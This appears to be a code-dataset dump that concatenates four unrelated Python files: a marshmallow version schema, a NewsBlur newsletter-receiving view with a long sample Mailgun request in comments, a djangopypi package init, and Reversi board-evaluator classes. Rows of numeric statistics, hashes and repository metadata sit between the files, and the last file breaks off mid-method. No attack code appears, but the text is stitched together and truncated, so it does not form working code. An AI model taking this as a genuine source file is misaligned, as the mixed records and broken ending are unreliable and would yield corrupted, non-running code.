# -*- coding: utf-8 -*-
from marshmallow import fields
from ddb.feature.schema import FeatureSchema
class VersionSchema(FeatureSchema):
"""
Git schema.
"""
branch = fields.String(allow_none=True) # default is set in feature _configure_defaults
tag = fields.String(allow_none=True) # default is set in feature _configure_defaults
version = fields.String(allow_none=True) # default is set in feature _configure_defaults
hash = fields.String(allow_none=True) # default is set in feature _configure_defaults
short_hash = fields.String(allow_none=True) # default is set in feature _configure_defaults
| 39.75
| 96
| 0.748428
| 84
| 636
| 5.47619
| 0.345238
| 0.130435
| 0.184783
| 0.228261
| 0.702174
| 0.702174
| 0.702174
| 0.702174
| 0.702174
| 0.702174
| 0
| 0.001898
| 0.171384
| 636
| 15
| 97
| 42.4
| 0.870968
| 0.415094
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
224d4c43569011fbc32ebc7385177fe888c00b26
| 11,187
|
py
|
Python
|
apps/newsletters/views.py
|
lance0428/NewsBlur
|
e1c1c4fd23b88e8848fb944f71379d0944c81d34
|
[
"MIT"
] | null | null | null |
apps/newsletters/views.py
|
lance0428/NewsBlur
|
e1c1c4fd23b88e8848fb944f71379d0944c81d34
|
[
"MIT"
] | null | null | null |
apps/newsletters/views.py
|
lance0428/NewsBlur
|
e1c1c4fd23b88e8848fb944f71379d0944c81d34
|
[
"MIT"
] | null | null | null |
from pprint import pprint
from django.http import HttpResponse, Http404
from django.conf import settings
from utils import log as logging
from apps.newsletters.models import EmailNewsletter
from apps.rss_feeds.models import Feed, MStory
def newsletter_receive(request):
# params = {
# 'stripped-signature':'Thanks,\nBob',
# 'From':'Test mailer <samuel@ofbrooklyn.com>',
# 'attachment-count':'2',
# 'To':'Alice <alice@newsletters.newsblur.com>',
# 'subject':'Test Newsletter #2',
# 'from':'Test mailer <samuel@ofbrooklyn.com>',
# 'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:17.0) Gecko/20130308 Thunderbird/17.0.4',
# 'stripped-html':'<html><head><meta content="text/html; charset=ISO-8859-1" http-equiv="Content-Type"></head><body text="#000000" bgcolor="#FFFFFF">\n <div class="moz-cite-prefix">\n <div style="color: rgb(34, 34, 34); font-family: arial,\n sans-serif; font-size: 12.666666984558105px; font-style: normal;\n font-variant: normal; font-weight: normal; letter-spacing:\n normal; line-height: normal; orphans: auto; text-align: start;\n text-indent: 0px; text-transform: none; white-space: normal;\n widows: auto; word-spacing: 0px; -webkit-text-size-adjust: auto;\n -webkit-text-stroke-width: 0px; background-color: rgb(255, 255,\n 255);">Hi Alice,</div>\n <div style="color: rgb(34, 34, 34); font-family: arial,\n sans-serif; font-size: 12.666666984558105px; font-style: normal;\n font-variant: normal; font-weight: normal; letter-spacing:\n normal; line-height: normal; orphans: auto; text-align: start;\n text-indent: 0px; text-transform: none; white-space: normal;\n widows: auto; word-spacing: 0px; -webkit-text-size-adjust: auto;\n -webkit-text-stroke-width: 0px; background-color: rgb(255, 255,\n 255);"><br></div>\n <div style="color: rgb(34, 34, 34); font-family: arial,\n sans-serif; font-size: 12.666666984558105px; font-style: normal;\n font-variant: normal; font-weight: normal; letter-spacing:\n normal; line-height: normal; orphans: auto; text-align: start;\n text-indent: 0px; text-transform: none; white-space: normal;\n widows: auto; word-spacing: 0px; -webkit-text-size-adjust: auto;\n -webkit-text-stroke-width: 0px; background-color: rgb(255, 255,\n 255);">This is Bob.<span class="Apple-converted-space"> <img alt="" src="cid:part1.04060802.06030207@newsletters.newsblur.com" height="15" width="33"></span></div>\n <div style="color: rgb(34, 34, 34); font-family: arial,\n sans-serif; font-size: 12.666666984558105px; font-style: normal;\n font-variant: normal; font-weight: normal; letter-spacing:\n normal; line-height: normal; orphans: auto; text-align: start;\n text-indent: 0px; text-transform: none; white-space: normal;\n widows: auto; word-spacing: 0px; -webkit-text-size-adjust: auto;\n -webkit-text-stroke-width: 0px; background-color: rgb(255, 255,\n 255);"><br>\n I also attached a file.<br><br></div>\n <div style="color: rgb(34, 34, 34); font-family: arial,\n sans-serif; font-size: 12.666666984558105px; font-style: normal;\n font-variant: normal; font-weight: normal; letter-spacing:\n normal; line-height: normal; orphans: auto; text-align: start;\n text-indent: 0px; text-transform: none; white-space: normal;\n widows: auto; word-spacing: 0px; -webkit-text-size-adjust: auto;\n -webkit-text-stroke-width: 0px; background-color: rgb(255, 255,\n 255);">Thanks,</div>\n <div style="color: rgb(34, 34, 34); font-family: arial,\n sans-serif; font-size: 12.666666984558105px; font-style: normal;\n font-variant: normal; font-weight: normal; letter-spacing:\n normal; line-height: normal; orphans: auto; text-align: start;\n text-indent: 0px; text-transform: none; white-space: normal;\n widows: auto; word-spacing: 0px; -webkit-text-size-adjust: auto;\n -webkit-text-stroke-width: 0px; background-color: rgb(255, 255,\n 255);">Bob</div>\n <br><br></div>\n <br></body></html>',
# 'In-Reply-To':'<517AC78B.5060404@newsletters.newsblur.com>',
# 'Date':'Fri, 26 Apr 2013 11:50:29 -0700',
# 'Message-Id':'<517ACC75.5010709@newsletters.newsblur.com>',
# 'body-plain':'Hi Alice,\n\nThis is Bob.\n\nI also attached a file.\n\nThanks,\nBob\n\nOn 04/26/2013 11:29 AM, Alice wrote:\n> Hi Bob,\n>\n> This is Alice. How are you doing?\n>\n> Thanks,\n> Alice\n\n',
# 'Mime-Version':'1.0',
# 'Received':'from [10.20.76.69] (Unknown [50.56.129.169]) by mxa.mailgun.org with ESMTP id 517acc75.4b341f0-worker2; Fri, 26 Apr 2013 18:50:29 -0000 (UTC)',
# 'content-id-map':'{"<part1.04060802.06030207@newsletters.newsblur.com>": "attachment-1"}',
# 'Sender':'bob@newsletters.newsblur.com',
# 'timestamp':'1455054990',
# 'message-headers':'[["Received", "by luna.mailgun.net with SMTP mgrt 8788212249833; Fri, 26 Apr 2013 18:50:30 +0000"], ["Received", "from [10.20.76.69] (Unknown [50.56.129.169]) by mxa.mailgun.org with ESMTP id 517acc75.4b341f0-worker2; Fri, 26 Apr 2013 18:50:29 -0000 (UTC)"], ["Message-Id", "<517ACC75.5010709@newsletters.newsblur.com>"], ["Date", "Fri, 26 Apr 2013 11:50:29 -0700"], ["From", "Test mailer <samuel@ofbrooklyn.com>"], ["User-Agent", "Mozilla/5.0 (X11; Linux x86_64; rv:17.0) Gecko/20130308 Thunderbird/17.0.4"], ["Mime-Version", "1.0"], ["To", "Alice <alice@newsletters.newsblur.com>"], ["Subject", "Re: Sample POST request"], ["References", "<517AC78B.5060404@newsletters.newsblur.com>"], ["In-Reply-To", "<517AC78B.5060404@newsletters.newsblur.com>"], ["X-Mailgun-Variables", "{\\"my_var_1\\": \\"Mailgun Variable #1\\", \\"my-var-2\\": \\"awesome\\"}"], ["Content-Type", "multipart/mixed; boundary=\\"------------020601070403020003080006\\""], ["Sender", "bob@newsletters.newsblur.com"]]',
# 'stripped-text':'Hi Alice,\n\nThis is Bob.\n\nI also attached a file.',
# 'recipient':'alice+555551235342@newsletters.newsblur.com',
# 'sender':'samuel@ofbrooklyn.com',
# 'X-Mailgun-Variables':'{"my_var_1": "Mailgun Variable #1", "my-var-2": "awesome"}',
# 'token':'cb2ef40ca2fee03a099f7da78ca07384228f00f023026c77a4',
# 'body-html':'<html>\n <head>\n <meta content="text/html; charset=ISO-8859-1"\n http-equiv="Content-Type">\n </head>\n <body text="#000000" bgcolor="#FFFFFF">\n <div class="moz-cite-prefix">\n <div style="color: rgb(34, 34, 34); font-family: arial,\n sans-serif; font-size: 12.666666984558105px; font-style: normal;\n font-variant: normal; font-weight: normal; letter-spacing:\n normal; line-height: normal; orphans: auto; text-align: start;\n text-indent: 0px; text-transform: none; white-space: normal;\n widows: auto; word-spacing: 0px; -webkit-text-size-adjust: auto;\n -webkit-text-stroke-width: 0px; background-color: rgb(255, 255,\n 255);">Hi Alice,</div>\n <div style="color: rgb(34, 34, 34); font-family: arial,\n sans-serif; font-size: 12.666666984558105px; font-style: normal;\n font-variant: normal; font-weight: normal; letter-spacing:\n normal; line-height: normal; orphans: auto; text-align: start;\n text-indent: 0px; text-transform: none; white-space: normal;\n widows: auto; word-spacing: 0px; -webkit-text-size-adjust: auto;\n -webkit-text-stroke-width: 0px; background-color: rgb(255, 255,\n 255);"><br>\n </div>\n <div style="color: rgb(34, 34, 34); font-family: arial,\n sans-serif; font-size: 12.666666984558105px; font-style: normal;\n font-variant: normal; font-weight: normal; letter-spacing:\n normal; line-height: normal; orphans: auto; text-align: start;\n text-indent: 0px; text-transform: none; white-space: normal;\n widows: auto; word-spacing: 0px; -webkit-text-size-adjust: auto;\n -webkit-text-stroke-width: 0px; background-color: rgb(255, 255,\n 255);">This is Bob.<span class="Apple-converted-space"> <img\n alt="" src="cid:part1.04060802.06030207@newsletters.newsblur.com"\n height="15" width="33"></span></div>\n <div style="color: rgb(34, 34, 34); font-family: arial,\n sans-serif; font-size: 12.666666984558105px; font-style: normal;\n font-variant: normal; font-weight: normal; letter-spacing:\n normal; line-height: normal; orphans: auto; text-align: start;\n text-indent: 0px; text-transform: none; white-space: normal;\n widows: auto; word-spacing: 0px; -webkit-text-size-adjust: auto;\n -webkit-text-stroke-width: 0px; background-color: rgb(255, 255,\n 255);"><br>\n I also attached a file.<br>\n <br>\n </div>\n <div style="color: rgb(34, 34, 34); font-family: arial,\n sans-serif; font-size: 12.666666984558105px; font-style: normal;\n font-variant: normal; font-weight: normal; letter-spacing:\n normal; line-height: normal; orphans: auto; text-align: start;\n text-indent: 0px; text-transform: none; white-space: normal;\n widows: auto; word-spacing: 0px; -webkit-text-size-adjust: auto;\n -webkit-text-stroke-width: 0px; background-color: rgb(255, 255,\n 255);">Thanks,</div>\n <div style="color: rgb(34, 34, 34); font-family: arial,\n sans-serif; font-size: 12.666666984558105px; font-style: normal;\n font-variant: normal; font-weight: normal; letter-spacing:\n normal; line-height: normal; orphans: auto; text-align: start;\n text-indent: 0px; text-transform: none; white-space: normal;\n widows: auto; word-spacing: 0px; -webkit-text-size-adjust: auto;\n -webkit-text-stroke-width: 0px; background-color: rgb(255, 255,\n 255);">Bob</div>\n <br>\n On 04/26/2013 11:29 AM, Alice wrote:<br>\n </div>\n <blockquote cite="mid:517AC78B.5060404@newsletters.newsblur.com" type="cite">Hi\n Bob,\n <br>\n <br>\n This is Alice. How are you doing?\n <br>\n <br>\n Thanks,\n <br>\n Alice\n <br>\n </blockquote>\n <br>\n </body>\n</html>\n',
# 'References':'<517AC78B.5060404@newsletters.newsblur.com>',
# 'signature':'1369fa4dcc7de7fac51f5bb408bd5c9daa8730e80d394e8a128658d74e669049',
# 'Content-Type':'multipart/mixed; boundary="------------020601070403020003080006"',
# 'Subject':'Test Newsletter #1'
# }
response = HttpResponse('OK')
if settings.DEBUG:
logging.debug(" ---> Email newsletter: %s" % pprint(request.REQUEST))
email_newsletter = EmailNewsletter()
story = email_newsletter.receive_newsletter(request.REQUEST)
if not story:
raise Http404
return response
def newsletter_story(request, story_hash):
story = MStory.objects.get(story_hash=story_hash)
story = Feed.format_story(story)
return HttpResponse(story['story_content'])
| 203.4
| 3,953
| 0.646375
| 1,575
| 11,187
| 4.580317
| 0.150476
| 0.026615
| 0.045744
| 0.023288
| 0.824508
| 0.809121
| 0.767535
| 0.746465
| 0.721098
| 0.699196
| 0
| 0.105166
| 0.176365
| 11,187
| 55
| 3,954
| 203.4
| 0.677773
| 0.913113
| 0
| 0
| 0
| 0
| 0.043944
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105263
| false
| 0
| 0.315789
| 0
| 0.526316
| 0.105263
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 11
|
2251754341deee657c2d4652bdc90f9ee3c8e527
| 63
|
py
|
Python
|
djangopypi/__init__.py
|
benliles/djangopypi
|
b62128979b3915cc8aeb1e6a8bfe59edd3243f0c
|
[
"BSD-3-Clause"
] | 31
|
2015-02-10T17:13:33.000Z
|
2021-10-05T04:48:55.000Z
|
djangopypi/__init__.py
|
EightMedia/djangopypi
|
a05a5a3872839f54dee43ebc5459230b7af36d4f
|
[
"BSD-3-Clause"
] | 5
|
2015-01-05T07:31:25.000Z
|
2021-01-03T00:56:57.000Z
|
djangopypi/__init__.py
|
EightMedia/djangopypi
|
a05a5a3872839f54dee43ebc5459230b7af36d4f
|
[
"BSD-3-Clause"
] | 10
|
2015-03-19T08:36:38.000Z
|
2017-12-07T20:27:42.000Z
|
from djangopypi import settings
from djangopypi import signals
| 21
| 31
| 0.873016
| 8
| 63
| 6.875
| 0.625
| 0.509091
| 0.727273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126984
| 63
| 2
| 32
| 31.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
97f44f03e7f00fbcc3e0a838ad9dcccbe56eba44
| 17,797
|
py
|
Python
|
reversi/strategies/coordinator/evaluator.py
|
y-tetsu/othello
|
73eabfe22d6b44bbfa0b436e6287e3e7356620f4
|
[
"MIT"
] | 10
|
2020-07-24T22:04:51.000Z
|
2022-03-25T06:09:48.000Z
|
reversi/strategies/coordinator/evaluator.py
|
y-tetsu/othello
|
73eabfe22d6b44bbfa0b436e6287e3e7356620f4
|
[
"MIT"
] | 12
|
2021-04-30T09:53:18.000Z
|
2022-02-25T04:16:02.000Z
|
reversi/strategies/coordinator/evaluator.py
|
y-tetsu/othello
|
73eabfe22d6b44bbfa0b436e6287e3e7356620f4
|
[
"MIT"
] | 1
|
2021-11-25T13:12:32.000Z
|
2021-11-25T13:12:32.000Z
|
"""Evaluator
"""
from reversi.strategies.common import AbstractEvaluator
from reversi.strategies.coordinator import TableScorer, PossibilityScorer, OpeningScorer, WinLoseScorer, NumberScorer, EdgeScorer, CornerScorer, BlankScorer, EdgeCornerScorer # noqa: E501
import reversi.strategies.coordinator.EvaluatorMethods as EvaluatorMethods
class Evaluator(AbstractEvaluator):
"""General Evaluator
"""
def __init__(self, separated=[], combined=[]):
self.separated = separated
self.combined = combined
def evaluate(self, color, board, possibility_b, possibility_w):
"""evaluate
"""
for scorer in self.separated:
score = scorer.get_score(color, board, possibility_b, possibility_w)
if score is not None:
return score
score = 0
for scorer in self.combined:
score += scorer.get_score(color, board, possibility_b, possibility_w)
return score
class Evaluator_T(AbstractEvaluator):
"""Specific Evaluator Table
盤面の評価値をTableで算出
"""
def __init__(self, size=8, corner=50, c=-20, a1=0, a2=-1, b1=-1, b2=-1, b3=-1, x=-25, o1=-5, o2=-5):
self.scorer = TableScorer(size, corner, c, a1, a2, b1, b2, b3, x, o1, o2) # Tableによる評価値算出
def evaluate(self, color, board, possibility_b, possibility_w):
"""evaluate
"""
return self.scorer.get_score(color, board, possibility_b, possibility_w)
class Evaluator_P(AbstractEvaluator):
"""Specific Evaluator Possibility
盤面の評価値を配置可能数で算出
"""
def __init__(self, wp=5):
self.scorer = PossibilityScorer(wp) # 配置可能数による評価値算出
def evaluate(self, color, board, possibility_b, possibility_w):
"""evaluate
"""
return self.scorer.get_score(color, board, possibility_b, possibility_w)
class Evaluator_O(AbstractEvaluator):
"""Specific Evaluator Opening
盤面の評価値を開放度で算出
"""
def __init__(self, wo=-0.75):
self.scorer = OpeningScorer(wo) # 開放度による評価値算出
def evaluate(self, color, board, possibility_b, possibility_w):
"""evaluate
"""
return self.scorer.get_score(color, board, possibility_b, possibility_w)
class Evaluator_W(AbstractEvaluator):
"""Specific Evaluator WinLose
盤面の評価値を勝敗で算出
"""
def __init__(self, ww=10000):
self.scorer = WinLoseScorer(ww) # 勝敗による評価値算出
def evaluate(self, color, board, possibility_b, possibility_w):
"""evaluate
"""
return self.scorer.get_score(color, board, possibility_b, possibility_w)
class Evaluator_N(AbstractEvaluator):
"""Specific Evaluator Number
盤面の評価値を石数で算出
"""
def __init__(self):
self.scorer = NumberScorer() # 石数による評価値算出
def evaluate(self, color, board, possibility_b, possibility_w):
"""evaluate
"""
return self.scorer.get_score(color, board, possibility_b, possibility_w)
class Evaluator_N_Fast(AbstractEvaluator):
"""Specific Evaluator Number
盤面の評価値を石数で算出
"""
def evaluate(self, color, board, possibility_b, possibility_w):
return board._black_score - board._white_score
class Evaluator_E(AbstractEvaluator):
"""Specific Evaluator Edge
辺のパターンの評価値を算出
"""
def __init__(self, w=100):
self.scorer = EdgeScorer(w) # 辺のパターンによる評価値算出
def evaluate(self, color, board, possibility_b, possibility_w):
"""evaluate
"""
return self.scorer.get_score(color, board, possibility_b, possibility_w)
class Evaluator_C(AbstractEvaluator):
"""Specific Evaluator Corner
隅のパターンの評価値を算出
"""
def __init__(self, w=100):
self.scorer = CornerScorer(w) # 隅のパターンによる評価値算出
def evaluate(self, color, board, possibility_b, possibility_w):
"""evaluate
"""
return self.scorer.get_score(color, board, possibility_b, possibility_w)
class Evaluator_B(AbstractEvaluator):
"""Specific Evaluator Blank
空きマスのパターンの評価値を算出
"""
def __init__(self, w1=-1, w2=-4, w3=-2):
self.scorer = BlankScorer(w1, w2, w3) # 空マスのパターンによる評価値算出
def evaluate(self, color, board, possibility_b, possibility_w):
"""evaluate
"""
return self.scorer.get_score(color, board, possibility_b, possibility_w)
class Evaluator_Ec(AbstractEvaluator):
"""Specific Evaluator EdgeCorner
辺と隅のパターンの評価値を算出
"""
def __init__(self, w1=1, w2=8):
self.scorer = EdgeCornerScorer(w1, w2) # 辺と隅のパターンによる評価値算出
def evaluate(self, color, board, possibility_b, possibility_w):
"""evaluate
"""
return self.scorer.get_score(color, board, possibility_b, possibility_w)
class Evaluator_TP(AbstractEvaluator):
"""Specific Evaluator Table + Possibility
盤面の評価値をTable+配置可能数で算出
"""
def __init__(self, size=8, corner=50, c=-20, a1=0, a2=-1, b1=-1, b2=-1, b3=-1, x=-25, o1=-5, o2=-5, wp=5):
self.t = TableScorer(size, corner, c, a1, a2, b1, b2, b3, x, o1, o2)
self.p = PossibilityScorer(wp)
def evaluate(self, color, board, possibility_b, possibility_w):
"""evaluate
"""
score_t = self.t.get_score(color, board, possibility_b, possibility_w)
score_p = self.p.get_score(color, board, possibility_b, possibility_w)
return score_t + score_p
class Evaluator_TPO(AbstractEvaluator):
"""Specific Evaluator Table + Possibility + Opening
盤面の評価値をTable+配置可能数+開放度で算出
"""
def __init__(self, size=8, corner=50, c=-20, a1=0, a2=-1, b1=-1, b2=-1, b3=-1, x=-25, o1=-5, o2=-5, wp=5, wo=-0.75):
self.t = TableScorer(size, corner, c, a1, a2, b1, b2, b3, x, o1, o2)
self.p = PossibilityScorer(wp)
self.o = OpeningScorer(wo)
def evaluate(self, color, board, possibility_b, possibility_w):
"""evaluate
"""
score_t = self.t.get_score(color, board, possibility_b, possibility_w)
score_p = self.p.get_score(color, board, possibility_b, possibility_w)
score_o = self.o.get_score(color, board, possibility_b, possibility_w)
return score_t + score_p + score_o
class Evaluator_NW(AbstractEvaluator):
"""Specific Evaluator Number + WinLose
盤面の評価値を石数+勝敗で算出
"""
def __init__(self, ww=10000):
self.n = NumberScorer()
self.w = WinLoseScorer(ww)
def evaluate(self, color, board, possibility_b, possibility_w):
"""evaluate
"""
score_w = self.w.get_score(color, board, possibility_b, possibility_w)
# 勝敗が決まっている場合
if score_w is not None:
return score_w
score_n = self.n.get_score(color, board, possibility_b, possibility_w)
return score_n
class Evaluator_PW(AbstractEvaluator):
"""Specific Evaluator Possibility + WinLose
盤面の評価値を配置可能数+勝敗で算出
"""
def __init__(self, wp=5, ww=10000):
self.p = PossibilityScorer(wp)
self.w = WinLoseScorer(ww)
def evaluate(self, color, board, possibility_b, possibility_w):
"""evaluate
"""
score_w = self.w.get_score(color, board, possibility_b, possibility_w)
# 勝敗が決まっている場合
if score_w is not None:
return score_w
score_p = self.p.get_score(color, board, possibility_b, possibility_w)
return score_p
class Evaluator_TPW(AbstractEvaluator):
"""Specific Evaluator Table + Possibility + WinLose
盤面の評価値をTable+配置可能数+勝敗で算出
"""
def __init__(self, size=8, corner=50, c=-20, a1=0, a2=-1, b1=-1, b2=-1, b3=-1, x=-25, o1=-5, o2=-5, wp=5, ww=10000):
self.t = TableScorer(size, corner, c, a1, a2, b1, b2, b3, x, o1, o2)
self.p = PossibilityScorer(wp)
self.w = WinLoseScorer(ww)
def evaluate(self, color, board, possibility_b, possibility_w):
"""evaluate
"""
score_w = self.w.get_score(color, board, possibility_b, possibility_w)
# 勝敗が決まっている場合
if score_w is not None:
return score_w
score_t = self.t.get_score(color, board, possibility_b, possibility_w)
score_p = self.p.get_score(color, board, possibility_b, possibility_w)
return score_t + score_p
class Evaluator_TPW_Fast(AbstractEvaluator):
"""Specific Evaluator Table + Possibility + WinLose
盤面の評価値をTable+配置可能数+勝敗で算出
"""
def __init__(self, size=8, corner=50, c=-20, a1=0, a2=-1, b1=-1, b2=-1, b3=-1, x=-25, o1=-5, o2=-5, wp=5, ww=10000):
self.t = TableScorer(size, corner, c, a1, a2, b1, b2, b3, x, o1, o2)
self.p = PossibilityScorer(wp)
self.w = WinLoseScorer(ww)
self.params = [wp, ww]
def evaluate(self, color, board, possibility_b, possibility_w):
return EvaluatorMethods.evaluate_tpw(self.t, self.params, color, board, possibility_b, possibility_w)
class Evaluator_TPOW(AbstractEvaluator):
"""Specific Evaluator Table + Possibility + Opening + WinLose
盤面の評価値をTable+配置可能数+開放度+勝敗で算出
"""
def __init__(self, size=8, corner=50, c=-20, a1=0, a2=-1, b1=-1, b2=-1, b3=-1, x=-25, o1=-5, o2=-5, wp=5, wo=-0.75, ww=10000):
self.t = TableScorer(size, corner, c, a1, a2, b1, b2, b3, x, o1, o2)
self.p = PossibilityScorer(wp)
self.o = OpeningScorer(wo)
self.w = WinLoseScorer(ww)
def evaluate(self, color, board, possibility_b, possibility_w):
"""evaluate
"""
score_w = self.w.get_score(color, board, possibility_b, possibility_w)
# 勝敗が決まっている場合
if score_w is not None:
return score_w
score_t = self.t.get_score(color, board, possibility_b, possibility_w)
score_p = self.p.get_score(color, board, possibility_b, possibility_w)
score_o = self.o.get_score(color, board, possibility_b, possibility_w)
return score_t + score_p + score_o
class Evaluator_TPWE(AbstractEvaluator):
"""Specific Evaluator Table + Possibility + WinLose + Edge
盤面の評価値をTable+配置可能数+勝敗+辺のパターンで算出
"""
def __init__(self, size=8, corner=50, c=-20, a1=0, a2=-1, b1=-1, b2=-1, b3=-1, x=-25, o1=-5, o2=-5, wp=5, ww=10000, we=100):
self.t = TableScorer(size, corner, c, a1, a2, b1, b2, b3, x, o1, o2)
self.p = PossibilityScorer(wp)
self.w = WinLoseScorer(ww)
self.e = EdgeScorer(we)
def evaluate(self, color, board, possibility_b, possibility_w):
"""evaluate
"""
score_w = self.w.get_score(color, board, possibility_b, possibility_w)
# 勝敗が決まっている場合
if score_w is not None:
return score_w
score_t = self.t.get_score(color, board, possibility_b, possibility_w)
score_p = self.p.get_score(color, board, possibility_b, possibility_w)
score_e = self.e.get_score(color, board, possibility_b, possibility_w)
return score_t + score_p + score_e
class Evaluator_TPWE_Fast(AbstractEvaluator):
"""Specific Evaluator Table + Possibility + WinLose + Edge
盤面の評価値をTable+配置可能数+勝敗+辺のパターンで算出
"""
def __init__(self, size=8, corner=50, c=-20, a1=0, a2=-1, b1=-1, b2=-1, b3=-1, x=-25, o1=-5, o2=-5, wp=5, ww=10000, we=100):
self.t = TableScorer(size, corner, c, a1, a2, b1, b2, b3, x, o1, o2)
self.p = PossibilityScorer(wp)
self.w = WinLoseScorer(ww)
self.e = EdgeScorer(we)
self.params = [wp, ww, we]
def evaluate(self, color, board, possibility_b, possibility_w):
return EvaluatorMethods.evaluate_tpwe(self.t, self.t.table.table, self.params, color, board, possibility_b, possibility_w)
class Evaluator_TPWEC(AbstractEvaluator):
"""Specific Eavluator Table + Possibility + WinLose + Edge + Corner
盤面の評価値をTable+配置可能数+勝敗+辺のパターン+隅のパターンで算出
"""
def __init__(self, size=8, corner=50, c=-20, a1=0, a2=-1, b1=-1, b2=-1, b3=-1, x=-25, o1=-5, o2=-5, wp=5, ww=10000, we=100, wc=120):
self.t = TableScorer(size, corner, c, a1, a2, b1, b2, b3, x, o1, o2)
self.p = PossibilityScorer(wp)
self.w = WinLoseScorer(ww)
self.e = EdgeScorer(we)
self.c = CornerScorer(wc)
def evaluate(self, color, board, possibility_b, possibility_w):
"""evaluate
"""
score_w = self.w.get_score(color, board, possibility_b, possibility_w)
# 勝敗が決まっている場合
if score_w is not None:
return score_w
score_t = self.t.get_score(color, board, possibility_b, possibility_w)
score_p = self.p.get_score(color, board, possibility_b, possibility_w)
score_e = self.e.get_score(color, board, possibility_b, possibility_w)
score_c = self.c.get_score(color, board, possibility_b, possibility_w)
return score_t + score_p + score_e + score_c
class Evaluator_PWE(AbstractEvaluator):
"""Specific Evaluator Possibility + WinLose + Edge
盤面の評価値を配置可能数+勝敗+辺のパターンで算出
"""
def __init__(self, size=8, wp=10, ww=10000, we=75):
self.p = PossibilityScorer(wp)
self.w = WinLoseScorer(ww)
self.e = EdgeScorer(we)
def evaluate(self, color, board, possibility_b, possibility_w):
"""evaluate
"""
score_w = self.w.get_score(color, board, possibility_b, possibility_w)
# 勝敗が決まっている場合
if score_w is not None:
return score_w
score_p = self.p.get_score(color, board, possibility_b, possibility_w)
score_e = self.e.get_score(color, board, possibility_b, possibility_w)
return score_p + score_e
class Evaluator_BW(AbstractEvaluator):
"""Specific Evaluator Blank + WinLose
盤面の評価値を空きマス+勝敗で算出
"""
def __init__(self, wb1=-1, wb2=-4, wb3=-2, ww=10000):
self.b = BlankScorer(wb1, wb2, wb3)
self.w = WinLoseScorer(ww)
def evaluate(self, color, board, possibility_b, possibility_w):
"""evaluate
"""
score_w = self.w.get_score(color, board, possibility_b, possibility_w)
# 勝敗が決まっている場合
if score_w is not None:
return score_w
score_b = self.b.get_score(color, board, possibility_b, possibility_w)
return score_b
class Evaluator_EcW(AbstractEvaluator):
"""Specific Evaluator EdgeCorner + WinLose
盤面の評価値を辺と隅のパターン+勝敗で算出
"""
def __init__(self, wec1=1, wec2=8, ww=10000):
self.ec = EdgeCornerScorer(wec1, wec2)
self.w = WinLoseScorer(ww)
def evaluate(self, color, board, possibility_b, possibility_w):
"""evaluate
"""
score_w = self.w.get_score(color, board, possibility_b, possibility_w)
# 勝敗が決まっている場合
if score_w is not None:
return score_w
score_ec = self.ec.get_score(color, board, possibility_b, possibility_w)
return score_ec
class Evaluator_BWEc(AbstractEvaluator):
"""Specific Evaluator Blank + WinLose + EdgeCorner
盤面の評価値を空きマスと辺と隅のパターン+勝敗で算出
"""
def __init__(self, wb1=-1, wb2=-4, wb3=-2, we1=1, we2=8, ww=10000):
self.b = BlankScorer(wb1, wb2, wb3)
self.ec = EdgeCornerScorer(we1, we2)
self.w = WinLoseScorer(ww)
def evaluate(self, color, board, possibility_b, possibility_w):
"""evaluate
"""
score_w = self.w.get_score(color, board, possibility_b, possibility_w)
# 勝敗が決まっている場合
if score_w is not None:
return score_w
score_b = self.b.get_score(color, board, possibility_b, possibility_w)
score_ec = self.ec.get_score(color, board, possibility_b, possibility_w)
return score_b + score_ec
class Evaluator_PBWEc(AbstractEvaluator):
"""Specific Evaluator Possibility + Blank + WinLose + EdgeCorner
盤面の評価値を着手可能数+空きマスと辺と隅のパターン+勝敗で算出
"""
def __init__(self, wp=5, wb1=-10, wb2=-40, wb3=-20, we1=10, we2=80, ww=10000):
self.p = PossibilityScorer(wp)
self.b = BlankScorer(wb1, wb2, wb3)
self.ec = EdgeCornerScorer(we1, we2)
self.w = WinLoseScorer(ww)
def evaluate(self, color, board, possibility_b, possibility_w):
"""evaluate
"""
score_w = self.w.get_score(color, board, possibility_b, possibility_w)
# 勝敗が決まっている場合
if score_w is not None:
return score_w
score_p = self.p.get_score(color, board, possibility_b, possibility_w)
score_b = self.b.get_score(color, board, possibility_b, possibility_w)
score_ec = self.ec.get_score(color, board, possibility_b, possibility_w)
return score_p + score_b + score_ec
class Evaluator_TPWEB(AbstractEvaluator):
"""Specific Evaluator Table + Possibility + WinLose + Edge + Blank
盤面の評価値をTable+配置可能数+勝敗+辺+空きマスのパターンで算出
"""
def __init__(self, size=8, corner=50, c=-20, a1=0, a2=-1, b1=-1, b2=-1, b3=-1, x=-25, o1=-5, o2=-5, wp=5, ww=10000, we=100, wb1=-5, wb2=-20, wb3=-10):
self.t = TableScorer(size, corner, c, a1, a2, b1, b2, b3, x, o1, o2)
self.p = PossibilityScorer(wp)
self.w = WinLoseScorer(ww)
self.e = EdgeScorer(we)
self.b = BlankScorer(wb1, wb2, wb3)
self.params = [wp, ww, we]
def evaluate(self, color, board, possibility_b, possibility_w):
"""evaluate
"""
score_w = self.w.get_score(color, board, possibility_b, possibility_w)
# 勝敗が決まっている場合
if score_w is not None:
return score_w
